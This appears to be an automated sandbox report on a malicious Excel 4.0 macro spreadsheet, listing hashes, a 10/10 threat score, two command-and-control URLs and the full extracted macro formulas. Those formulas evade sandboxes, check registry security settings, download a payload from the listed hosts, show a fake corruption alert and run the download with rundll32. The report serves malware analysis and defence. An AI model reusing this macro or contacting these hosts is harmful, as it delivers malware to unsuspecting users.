Static task: static1
Behavioral task: behavioral1
  Sample: 5af3bdbe31bf60ddc4bd101f4bee6e843a58450b4d39c8a12ce58135ec4b1b19.xls
  Resource: win7v200410
Behavioral task: behavioral2
  Sample: 5af3bdbe31bf60ddc4bd101f4bee6e843a58450b4d39c8a12ce58135ec4b1b19.xls
  Resource: win10v200410
General
- Target
- Size: 192KB
- MD5: bf1efbdca05fab7682b9da5b800c2d4c
- SHA1: e57949811523eed8ab9321394a537bb909eaa7e7
- SHA256: 5af3bdbe31bf60ddc4bd101f4bee6e843a58450b4d39c8a12ce58135ec4b1b19
- SHA512: 4ba1b206c2085926972d87d044b770394443b129e707c8f396725597b36a9cb4f7be5de7a9026d579331d6af5a3365d74e3cfe1148420010a2625c7681ed8b07
Score: 10/10
Malware Config
Extracted
Rule: Excel 4.0 XLM Macro
C2:
  https://gameaze.com/wp-content/themes/wp_data.php
  https://friendoffishing.com/wp-content/themes/calliope/template-parts/wp_data.php
Attributes:
formulas:
=IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),)
=IF(GET.WORKSPACE(14)<390,CLOSE(FALSE),)
=IF(GET.WORKSPACE(19),,CLOSE(TRUE))
=IF(GET.WORKSPACE(42),,CLOSE(TRUE))
=IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,CLOSE(TRUE))
="C:\Users\"&GET.WORKSPACE(26)&"\AppData\Local\Temp\"&RANDBETWEEN(1,9999)&".reg"
="EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security "&R[-1]C&" /y"
=CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe",R[-1]C,0,5)
=WAIT(NOW()+"00:00:03")
=FOPEN(R[-4]C)
=FPOS(R[-1]C,215)
=FREAD(R[-2]C,255)
=FCLOSE(R[-3]C)
=FILE.DELETE(R[-8]C)
=IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
="C:\Users\"&GET.WORKSPACE(26)&"\AppData\Local\Temp\CVR"&RANDBETWEEN(1000,9999)&".tmp.cvr"
="https://gameaze.com/wp-content/themes/wp_data.php"
="https://friendoffishing.com/wp-content/themes/calliope/template-parts/wp_data.php"
=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,R[-2]C,R[-3]C,0,0)
=IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,R[-2]C,R[-4]C,0,0),)
=ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
=CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe",R[-6]C&",DllRegisterServer",0,5)
=CLOSE(FALSE)
=GOTO(Y1)
Signatures
Files
- 5af3bdbe31bf60ddc4bd101f4bee6e843a58450b4d39c8a12ce58135ec4b1b19.xls (tags: windows office2003)